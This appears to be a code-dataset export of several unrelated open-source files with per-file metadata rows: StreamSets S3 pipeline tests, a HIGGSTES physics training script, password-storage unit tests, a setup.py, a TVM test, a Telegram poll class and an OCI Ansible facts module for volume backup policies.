@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_host(sdc_builder, sdc_executor, use_proxy):
pass
@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_password(sdc_builder, sdc_executor, use_proxy):
pass
@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_port(sdc_builder, sdc_executor, use_proxy):
pass
@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_user(sdc_builder, sdc_executor, use_proxy):
pass
@pytest.mark.parametrize('region', ['AP_NORTHEAST_1', 'AP_NORTHEAST_2', 'AP_NORTHEAST_3', 'AP_SOUTHEAST_1', 'AP_SOUTHEAST_2', 'AP_SOUTH_1', 'CA_CENTRAL_1', 'CN_NORTHWEST_1', 'CN_NORTH_1', 'EU_CENTRAL_1', 'EU_WEST_1', 'EU_WEST_2', 'EU_WEST_3', 'OTHER', 'SA_EAST_1', 'US_EAST_1', 'US_EAST_2', 'US_GOV_WEST_1', 'US_WEST_1', 'US_WEST_2'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_region(sdc_builder, sdc_executor, region):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_required_fields(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_retry_count(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_secret_access_key(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_socket_timeout(sdc_builder, sdc_executor):
pass
@pytest.mark.parametrize('task', ['CHANGE_EXISTING_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_tags(sdc_builder, sdc_executor, task):
pass
@pytest.mark.parametrize('task', ['CHANGE_EXISTING_OBJECT', 'COPY_OBJECT', 'CREATE_NEW_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_task(sdc_builder, sdc_executor, task):
pass
@pytest.mark.parametrize('use_proxy', [False, True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_use_proxy(sdc_builder, sdc_executor, use_proxy):
pass
@aws('s3')
@pytest.mark.parametrize('data_format', ['LOG'])
@pytest.mark.parametrize('log_format', ['COMMON_LOG_FORMAT', 'APACHE_ERROR_LOG_FORMAT', 'COMBINED_LOG_FORMAT',
'APACHE_CUSTOM_LOG_FORMAT', 'REGEX', 'GROK', 'LOG4J', 'CEF', 'LEEF'])
def test_configurations_data_format_log(sdc_executor, sdc_builder, aws, data_format, log_format):
"""Check whether S3 origin can parse different log format or not. A log file is being created in s3 bucket
mentioned below .S3 origin reads the log file and parse the same.
Pipeline for the same-
s3_origin >> trash
s3_origin >= pipeline_finisher_executor
"""
if log_format == 'GROK':
file_content = data_format_content['APACHE_CUSTOM_LOG_FORMAT']
else:
file_content = data_format_content[log_format]
client = aws.s3
s3_key = f'{S3_SANDBOX_PREFIX}/{get_random_string()}'
attributes = {'bucket': aws.s3_bucket_name,
'prefix_pattern': f'{s3_key}/*',
'number_of_threads': 1,
'read_order': 'LEXICOGRAPHICAL',
'data_format': data_format,
'log_format': log_format,
'custom_log_format': '%h %l %u [%t] "%r" %>s %b',
'regular_expression': REGULAR_EXPRESSION,
'field_path_to_regex_group_mapping': LOG_FIELD_MAPPING
}
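# custom_log_format above uses Apache LogFormat directives (%h client host,
# %l logname, %u user, [%t] time, "%r" request line, %>s final status,
# %b response bytes).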
pipeline = get_aws_origin_to_trash_pipeline(sdc_builder, attributes, aws)
s3_origin = pipeline.origin_stage
try:
client.put_object(Bucket=aws.s3_bucket_name, Key=f'{s3_key}/{get_random_string()}.log', Body=file_content)
output_records = execute_pipeline_and_get_output(sdc_executor, s3_origin, pipeline)
assert output_records[0].field == get_data_to_verify_output[log_format]
finally:
if sdc_executor.get_pipeline_status(pipeline).response.json().get('status') == 'RUNNING':
sdc_executor.stop_pipeline(pipeline)
# cleaning up s3 bucket
delete_aws_objects(client, aws, s3_key)
def get_aws_origin_to_trash_pipeline(sdc_builder, attributes, aws):
# Build pipeline.
builder = sdc_builder.get_pipeline_builder()
builder.add_error_stage('Discard')
s3_origin = builder.add_stage('Amazon S3', type='origin')
s3_origin.set_attributes(**attributes)
trash = builder.add_stage('Trash')
pipeline_finisher_executor = builder.add_stage('Pipeline Finisher Executor')
pipeline_finisher_executor.set_attributes(stage_record_preconditions=["${record:eventType() == 'no-more-data'}"])
s3_origin >> trash
s3_origin >= pipeline_finisher_executor
s3_origin_pipeline = builder.build().configure_for_environment(aws)
s3_origin_pipeline.configuration['shouldRetry'] = False
return s3_origin_pipeline
def delete_aws_objects(client, aws, s3_key):
# Clean up S3.
delete_keys = {'Objects': [{'Key': k['Key']}
for k in
client.list_objects_v2(Bucket=aws.s3_bucket_name, Prefix=s3_key)['Contents']]}
client.delete_objects(Bucket=aws.s3_bucket_name, Delete=delete_keys)
def execute_pipeline_and_get_output(sdc_executor, s3_origin, pipeline):
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
output_records = snapshot[s3_origin].output
return output_records
| 46.84556 | 334 | 0.656556 | 1,539 | 12,133 | 4.925926 | 0.223522 | 0.050125 | 0.040628 | 0.049334 | 0.502308 | 0.45614 | 0.441367 | 0.397705 | 0.351801 | 0.311305 | 0 | 0.050808 | 0.193769 | 12,133 | 258 | 335 | 47.027132 | 0.724187 | 0.031979 | 0 | 0.26178 | 0 | 0.04712 | 0.359911 | 0.071111 | 0 | 0 | 0 | 0 | 0.005236 | 1 | 0.136126 | false | 0.120419 | 0.020942 | 0 | 0.167539 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0 | 1 | 7cfcc11fbbb1d31705e442bed5fe7d622b04a2bd | 4,472 | py | Python | benchmark/AMS/HIGGSTES/TP.py | victor-estrade/SystGradDescent | 822e7094290301ec47a99433381a8d6406798aff | ["MIT"] | 2 | 2019-03-20T09:05:02.000Z | 2019-03-20T15:23:44.000Z | benchmark/AMS/HIGGSTES/TP.py | victor-estrade/SystGradDescent | 822e7094290301ec47a99433381a8d6406798aff | ["MIT"] | null | null | null | benchmark/AMS/HIGGSTES/TP.py | victor-estrade/SystGradDescent | 822e7094290301ec47a99433381a8d6406798aff | ["MIT"] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from __future__ import unicode_literals
# Command line :
# python -m benchmark.AMS.HIGGSTES.TP
import os
import logging
from config import SEED
from config import _ERROR
from config import _TRUTH
import numpy as np
import pandas as pd
from visual.misc import set_plot_config
set_plot_config()
from utils.log import set_logger
from utils.log import flush
from utils.log import print_line
from utils.model import get_model
from utils.model import get_optimizer
from utils.model import train_or_load_neural_net
from utils.evaluation import evaluate_summary_computer
from utils.images import gather_images
from visual.misc import plot_params
from problem.higgs import HiggsConfigTesOnly as Config
from problem.higgs import get_generators_torch
from problem.higgs import GeneratorCPU
from problem.higgs import GeneratorTorch
from problem.higgs import HiggsNLL as NLLComputer
from model.tangent_prop import TangentPropClassifier
from archi.classic import L4 as ARCHI
from ...my_argparser import TP_parse_args
from collections import OrderedDict
from .common import measurement
DATA_NAME = 'HIGGSTES'
BENCHMARK_NAME = 'VAR-'+DATA_NAME
N_ITER = 30
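# TrainGenerator wraps the torch data generator so that the nuisance
# parameters (tes, jes, les) and the signal strength mu are differentiable
# tensors that tangent propagation can back-propagate through.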
class TrainGenerator:
def __init__(self, data_generator, cuda=False):
self.data_generator = data_generator
if cuda:
self.data_generator.cuda()
else:
self.data_generator.cpu()
self.mu = self.tensor(Config.CALIBRATED.mu, requires_grad=True)
self.tes = self.tensor(Config.CALIBRATED.tes, requires_grad=True)
self.jes = self.tensor(Config.CALIBRATED.jes, requires_grad=True)
self.les = self.tensor(Config.CALIBRATED.les, requires_grad=True)
self.params = (self.tes, self.jes, self.les, self.mu)
self.nuisance_params = OrderedDict([
('tes', self.tes),
('jes', self.jes),
('les', self.les),
])
def generate(self, n_samples=None):
X, y, w = self.data_generator.diff_generate(*self.params, n_samples=n_samples)
return X, y, w
def reset(self):
self.data_generator.reset()
def tensor(self, data, requires_grad=False, dtype=None):
return self.data_generator.tensor(data, requires_grad=requires_grad, dtype=dtype)
def build_model(args, i_cv):
args.net = ARCHI(n_in=29, n_out=2, n_unit=args.n_unit)
args.optimizer = get_optimizer(args)
model = get_model(args, TangentPropClassifier)
model.set_info(DATA_NAME, BENCHMARK_NAME, i_cv)
return model
# =====================================================================
# MAIN
# =====================================================================
def main():
# BASIC SETUP
logger = set_logger()
args = TP_parse_args(main_description="Training launcher for Tangent Propagation on HIGGSTES benchmark")
logger.info(args)
flush(logger)
# INFO
model = build_model(args, -1)
os.makedirs(model.results_directory, exist_ok=True)
# RUN
logger.info(f'Running runs [{args.start_cv},{args.end_cv}[')
results = [run(args, i_cv) for i_cv in range(args.start_cv, args.end_cv)]
results = pd.concat(results, ignore_index=True)
# EVALUATION
results.to_csv(os.path.join(model.results_directory, 'threshold.csv'))
print(results)
print("DONE !")
def run(args, i_cv):
logger = logging.getLogger()
print_line()
logger.info('Running iter n°{}'.format(i_cv))
print_line()
# LOAD/GENERATE DATA
logger.info('Set up data generator')
config = Config()
seed = SEED + i_cv * 5
train_generator, valid_generator, test_generator = get_generators_torch(seed, cuda=args.cuda)
train_generator = TrainGenerator(train_generator, cuda=args.cuda)
valid_generator = GeneratorCPU(valid_generator)
test_generator = GeneratorCPU(test_generator)
# SET MODEL
logger.info('Set up classifier')
model = build_model(args, i_cv)
os.makedirs(model.results_path, exist_ok=True)
flush(logger)
# TRAINING / LOADING
train_or_load_neural_net(model, train_generator, retrain=args.retrain)
# MEASUREMENT
results = measurement(model, i_cv, config, valid_generator, test_generator)
print(results)
return results
if __name__ == '__main__':
main()
| 30.841379 | 97 | 0.687165 | 590 | 4,472 | 4.981356 | 0.283051 | 0.039809 | 0.04049 | 0.037428 | 0.059204 | 0.018374 | 0.018374 | 0 | 0 | 0 | 0 | 0.002498 | 0.19432 | 4,472 | 144 | 98 | 31.055556 | 0.812934 | 0.070662 | 0 | 0.06 | 0 | 0 | 0.046366 | 0.007486 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07 | false | 0 | 0.31 | 0.01 | 0.43 | 0.07 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0 | 1 | 6b00216e5015b612b495eca186f46004bdc92b04 | 1,824 | py | Python | test/test_storage.py | jrabasco/PyPasser | 3cc6ecdfa9b5fe22f5a88c221517fe09d2df9db6 | ["MIT"] | null | null | null | test/test_storage.py | jrabasco/PyPasser | 3cc6ecdfa9b5fe22f5a88c221517fe09d2df9db6 | ["MIT"] | null | null | null | test/test_storage.py | jrabasco/PyPasser | 3cc6ecdfa9b5fe22f5a88c221517fe09d2df9db6 | ["MIT"] | null | null | null |
#!/usr/bin/python3.4
__author__ = "Jeremy Rabasco"
import sys
import os
sys.path.append("..")
import unittest
from modules import storage
from modules.service import Service
from modules.database import Database
class TestStorage(unittest.TestCase):
def setUp(self):
self.service = Service()
self.database = Database()
open("test.service", "w+").close()
open("test.db", "w+").close()
def test_write_read_service(self):
self.service.service_name = "Hello"
self.service.username = "This"
self.service.password = "Works"
storage.write("test", self.service, "test.service")
service2 = Service()
storage.read("test", service2, "test.service")
self.assertEqual(service2.service_name, self.service.service_name)
self.assertEqual(service2.username, self.service.username)
self.assertEqual(service2.password, self.service.password)
def test_write_read_database(self):
self.database.add_service(Service())
self.database.add_service(Service())
self.database.name = "Hey"
storage.write("test", self.database, "test.db")
database2 = Database()
storage.read("test", database2, "test.db")
self.assertEqual(database2.name, self.database.name)
for i in range(len(self.database.services)):
self.assertEqual(database2.services[i].service_name, self.database.services[i].service_name)
self.assertEqual(database2.services[i].username, self.database.services[i].username)
self.assertEqual(database2.services[i].password, self.database.services[i].password)
def tearDown(self):
os.remove(os.getcwd() + "/test.service")
os.remove(os.getcwd() + "/test.db")
if __name__ == "__main__":
unittest.main()
| 35.076923 | 104 | 0.668311 | 215 | 1,824 | 5.553488 | 0.246512 | 0.100503 | 0.050251 | 0.065327 | 0.204355 | 0.058626 | 0.058626 | 0 | 0 | 0 | 0 | 0.008844 | 0.194079 | 1,824 | 52 | 105 | 35.076923 | 0.803401 | 0.010417 | 0 | 0.04878 | 0 | 0 | 0.077008 | 0 | 0 | 0 | 0 | 0 | 0.170732 | 1 | 0.097561 | false | 0.073171 | 0.146341 | 0 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0 | 1 | 6b01058178b8f414abe46085a609e4696e9cb097 | 1,096 | py | Python | setup.py | ripiuk/fant_sizer | dcc0908c79ed76af3f4189ebd2a75cecf7a89e34 | ["MIT"] | null | null | null | setup.py | ripiuk/fant_sizer | dcc0908c79ed76af3f4189ebd2a75cecf7a89e34 | ["MIT"] | null | null | null | setup.py | ripiuk/fant_sizer | dcc0908c79ed76af3f4189ebd2a75cecf7a89e34 | ["MIT"] | null | null | null |
from setuptools import setup, find_packages
from os.path import join, dirname
setup(
name="fant_sizer",
version="0.7",
author="Rypiuk Oleksandr",
author_email="ripiuk96@gmail.com",
description="fant_sizer command-line file-information",
url="https://github.com/ripiuk/fant_sizer",
keywords="file command-line information size tool recursively",
license="MIT",
classifiers=[
'Topic :: Utilities',
'Environment :: Console',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Development Status :: 5 - Production/Stable',
'Programming Language :: Python :: 3.6'
],
packages=find_packages(),
long_description=open(join(dirname(__file__), "README.rst")).read(),
entry_points={
"console_scripts":
['fant_sizer = fant_sizer.fant_sizer:_main'],
},
)
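# After installation (`pip install .`), setuptools exposes a `fant_sizer`
# console command that dispatches to fant_sizer.fant_sizer:_main.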
| 36.533333 | 76 | 0.581204 | 104 | 1,096 | 5.961538 | 0.673077 | 0.087097 | 0.041935 | 0.058065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009091 | 0.297445 | 1,096 | 29 | 77 | 37.793103 | 0.796104 | 0 | 0 | 0 | 0 | 0 | 0.457117 | 0.024635 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0 | 1 | 6b04db30f6d56200725a9e9d3be9cbc67d645d65 | 2,074 | py | Python | tests/python/unittest/test_tir_pass_inject_double_buffer.py | 0xreza/tvm | f08d5d78ee000b2c113ac451f8d73817960eafd5 | ["Zlib", "Unlicense", "Apache-2.0", "BSD-2-Clause", "MIT", "ECL-2.0"] | null | null | null | tests/python/unittest/test_tir_pass_inject_double_buffer.py | 0xreza/tvm | f08d5d78ee000b2c113ac451f8d73817960eafd5 | ["Zlib", "Unlicense", "Apache-2.0", "BSD-2-Clause", "MIT", "ECL-2.0"] | 1 | 2020-07-29T00:21:19.000Z | 2020-07-29T00:21:19.000Z | tests/python/unittest/test_tir_pass_inject_double_buffer.py | 0xreza/tvm | f08d5d78ee000b2c113ac451f8d73817960eafd5 | ["Zlib", "Unlicense", "Apache-2.0", "BSD-2-Clause", "MIT", "ECL-2.0"] | 1 | 2021-07-22T17:33:16.000Z | 2021-07-22T17:33:16.000Z |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
def test_double_buffer():
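# Build a copy kernel with IRBuilder, mark buffer B with "double_buffer_scope",
# then check that InjectDoubleBuffer doubles the shared allocation (extent 2)
# and that ThreadSync inserts 4 "tvm_storage_sync" calls.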
dtype = 'int64'
n = 100
m = 4
tx = te.thread_axis("threadIdx.x")
ib = tvm.tir.ir_builder.create()
A = ib.pointer("float32", name="A")
C = ib.pointer("float32", name="C")
ib.scope_attr(tx, "thread_extent", 1)
with ib.for_range(0, n) as i:
B = ib.allocate("float32", m, name="B", scope="shared")
with ib.new_scope():
ib.scope_attr(B.asobject(), "double_buffer_scope", 1)
with ib.for_range(0, m) as j:
B[j] = A[i * 4 + j]
with ib.for_range(0, m) as j:
C[j] = B[j] + 1
stmt = ib.get()
stmt = tvm.tir.ir_pass.InjectDoubleBuffer(stmt, 2)
stmt = tvm.tir.ir_pass.Simplify(stmt)
assert isinstance(stmt.body.body, tvm.tir.Allocate)
assert stmt.body.body.extents[0].value == 2
mod = tvm.IRModule({
"db" : tvm.tir.PrimFunc([A.asobject(), C.asobject()], stmt)
})
f = tvm.tir.transform.ThreadSync("shared")(mod)["db"]
count = [0]
def count_sync(op):
if isinstance(op, tvm.tir.Call) and op.name == "tvm_storage_sync":
count[0] += 1
tvm.tir.ir_pass.PostOrderVisit(f.body, count_sync)
assert count[0] == 4
if __name__ == "__main__":
test_double_buffer()
| 36.385965 | 74 | 0.655738 | 318 | 2,074 | 4.18239 | 0.430818 | 0.03609 | 0.02406 | 0.031579 | 0.065414 | 0.041353 | 0.028571 | 0.028571 | 0 | 0 | 0 | 0.019171 | 0.220347 | 2,074 | 56 | 75 | 37.035714 | 0.80334 | 0.362584 | 0 | 0.055556 | 0 | 0 | 0.085824 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.055556 | false | 0.083333 | 0.055556 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0 | 1 | 6b0a2521796cb92f0d1e011306fd05dc969275cf | 355 | py | Python | origamibot/core/teletypes/poll_option.py | cmd410/OrigamiBot | 03667d069f0c0b088671936ce36bf8f85a029b93 | ["MIT"] | 4 | 2020-06-30T10:32:54.000Z | 2020-11-01T23:07:58.000Z | origamibot/core/teletypes/poll_option.py | cmd410/OrigamiBot | 03667d069f0c0b088671936ce36bf8f85a029b93 | ["MIT"] | 6 | 2020-06-26T23:14:59.000Z | 2020-07-26T11:48:07.000Z | origamibot/core/teletypes/poll_option.py | cmd410/OrigamiBot | 03667d069f0c0b088671936ce36bf8f85a029b93 | ["MIT"] | 1 | 2020-07-28T08:52:51.000Z | 2020-07-28T08:52:51.000Z |
from .base import TelegramStructure, Field
class PollOption(TelegramStructure):
text = Field()
voter_count = Field()
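# Class-level Field() declarations mirror the Telegram Bot API PollOption
# schema; __init__ re-binds them to value-carrying fields with type checks.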
def __init__(self,
text: str,
voter_count: int
):
self.text = \
Field(text, [str])
self.voter_count = \
Field(voter_count, [int])
| 19.722222 | 42 | 0.515493 | 33 | 355 | 5.30303 | 0.454545 | 0.228571 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.388732 | 355 | 17 | 43 | 20.882353 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 1 | 6b0f57abb4c6963ae8d955c1ecf87495f2b1c219 | 12,193 | py | Python | plugins/modules/oci_blockstorage_volume_backup_policy_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | ["Apache-2.0"] | null | null | null | plugins/modules/oci_blockstorage_volume_backup_policy_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | ["Apache-2.0"] | null | null | null | plugins/modules/oci_blockstorage_volume_backup_policy_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_blockstorage_volume_backup_policy_facts
short_description: Fetches details about one or multiple VolumeBackupPolicy resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple VolumeBackupPolicy resources in Oracle Cloud Infrastructure
- Lists all the volume backup policies available in the specified compartment.
- For more information about Oracle defined backup policies and user defined backup policies,
see L(Policy-Based Backups,https://docs.cloud.oracle.com/iaas/Content/Block/Tasks/schedulingvolumebackups.htm).
- If I(policy_id) is specified, the details of a single VolumeBackupPolicy will be returned.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
policy_id:
description:
- The OCID of the volume backup policy.
- Required to get a specific volume_backup_policy.
type: str
aliases: ["id"]
compartment_id:
description:
- The OCID of the compartment.
If no compartment is specified, the Oracle defined backup policies are listed.
type: str
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_display_name_option ]
"""
EXAMPLES = """
- name: Get a specific volume_backup_policy
oci_blockstorage_volume_backup_policy_facts:
# required
policy_id: "ocid1.policy.oc1..xxxxxxEXAMPLExxxxxx"
- name: List volume_backup_policies
oci_blockstorage_volume_backup_policy_facts:
# optional
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
"""
RETURN = """
volume_backup_policies:
description:
- List of VolumeBackupPolicy resources
returned: on success
type: complex
contains:
display_name:
description:
- A user-friendly name. Does not have to be unique, and it's changeable.
Avoid entering confidential information.
returned: on success
type: str
sample: display_name_example
id:
description:
- The OCID of the volume backup policy.
returned: on success
type: str
sample: "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx"
schedules:
description:
- The collection of schedules that this policy will apply.
returned: on success
type: complex
contains:
backup_type:
description:
- The type of volume backup to create.
returned: on success
type: str
sample: FULL
offset_seconds:
description:
- The number of seconds that the volume backup start
time should be shifted from the default interval boundaries specified by
the period. The volume backup start time is the frequency start time plus the offset.
returned: on success
type: int
sample: 56
period:
description:
- The volume backup frequency.
returned: on success
type: str
sample: ONE_HOUR
offset_type:
description:
- Indicates how the offset is defined. If value is `STRUCTURED`,
then `hourOfDay`, `dayOfWeek`, `dayOfMonth`, and `month` fields are used
and `offsetSeconds` will be ignored in requests and users should ignore its
value from the responses.
- "`hourOfDay` is applicable for periods `ONE_DAY`,
`ONE_WEEK`, `ONE_MONTH` and `ONE_YEAR`."
- "`dayOfWeek` is applicable for period
`ONE_WEEK`."
- "`dayOfMonth` is applicable for periods `ONE_MONTH` and `ONE_YEAR`."
- "'month' is applicable for period 'ONE_YEAR'."
- They will be ignored in the requests for inapplicable periods.
- If value is `NUMERIC_SECONDS`, then `offsetSeconds`
will be used for both requests and responses and the structured fields will be
ignored in the requests and users should ignore their values from the responses.
- For clients using older versions of Apis and not sending `offsetType` in their
requests, the behaviour is just like `NUMERIC_SECONDS`.
returned: on success
type: str
sample: STRUCTURED
hour_of_day:
description:
- The hour of the day to schedule the volume backup.
returned: on success
type: int
sample: 56
day_of_week:
description:
- The day of the week to schedule the volume backup.
returned: on success
type: str
sample: MONDAY
day_of_month:
description:
- The day of the month to schedule the volume backup.
returned: on success
type: int
sample: 56
month:
description:
- The month of the year to schedule the volume backup.
returned: on success
type: str
sample: JANUARY
retention_seconds:
description:
- How long, in seconds, to keep the volume backups created by this schedule.
returned: on success
type: int
sample: 56
time_zone:
description:
- Specifies what time zone is the schedule in
returned: on success
type: str
sample: UTC
destination_region:
description:
- The paired destination region for copying scheduled backups to. Example `us-ashburn-1`.
See L(Region Pairs,https://docs.cloud.oracle.com/iaas/Content/Block/Tasks/schedulingvolumebackups.htm#RegionPairs) for details about paired
regions.
returned: on success
type: str
sample: us-phoenix-1
time_created:
description:
- The date and time the volume backup policy was created. Format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
compartment_id:
description:
- The OCID of the compartment that contains the volume backup.
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
defined_tags:
description:
- Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see L(Resource Tags,https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
freeform_tags:
description:
- Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see L(Resource
Tags,https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Department\\": \\"Finance\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
sample: [{
"display_name": "display_name_example",
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"schedules": [{
"backup_type": "FULL",
"offset_seconds": 56,
"period": "ONE_HOUR",
"offset_type": "STRUCTURED",
"hour_of_day": 56,
"day_of_week": "MONDAY",
"day_of_month": 56,
"month": "JANUARY",
"retention_seconds": 56,
"time_zone": "UTC"
}],
"destination_region": "us-phoenix-1",
"time_created": "2013-10-20T19:20:30+01:00",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"defined_tags": {'Operations': {'CostCenter': 'US'}},
"freeform_tags": {'Department': 'Finance'}
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.core import BlockstorageClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class VolumeBackupPolicyFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: get, list"""
def get_required_params_for_get(self):
return [
"policy_id",
]
def get_required_params_for_list(self):
return []
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_volume_backup_policy,
policy_id=self.module.params.get("policy_id"),
)
def list_resources(self):
optional_list_method_params = [
"compartment_id",
"display_name",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_volume_backup_policies, **optional_kwargs
)
VolumeBackupPolicyFactsHelperCustom = get_custom_class(
"VolumeBackupPolicyFactsHelperCustom"
)
class ResourceFactsHelper(
VolumeBackupPolicyFactsHelperCustom, VolumeBackupPolicyFactsHelperGen
):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
policy_id=dict(aliases=["id"], type="str"),
compartment_id=dict(type="str"),
display_name=dict(type="str"),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="volume_backup_policy",
service_client_class=BlockstorageClient,
namespace="core",
)
result = []
if resource_facts_helper.is_get():
result = [resource_facts_helper.get()]
elif resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(volume_backup_policies=result)
if __name__ == "__main__":
main()
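For orientation, a minimal sketch of the underlying SDK calls this module wraps; the config profile and printed fields are illustrative assumptions, not taken from the module:
# Hedged sketch of the wrapped SDK calls; assumes a valid ~/.oci/config
# profile with permission to read volume backup policies.
import oci

config = oci.config.from_file()
client = oci.core.BlockstorageClient(config)
# With no compartment_id, this returns the Oracle-defined policies.
for policy in client.list_volume_backup_policies().data:
    print(policy.display_name, policy.id)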
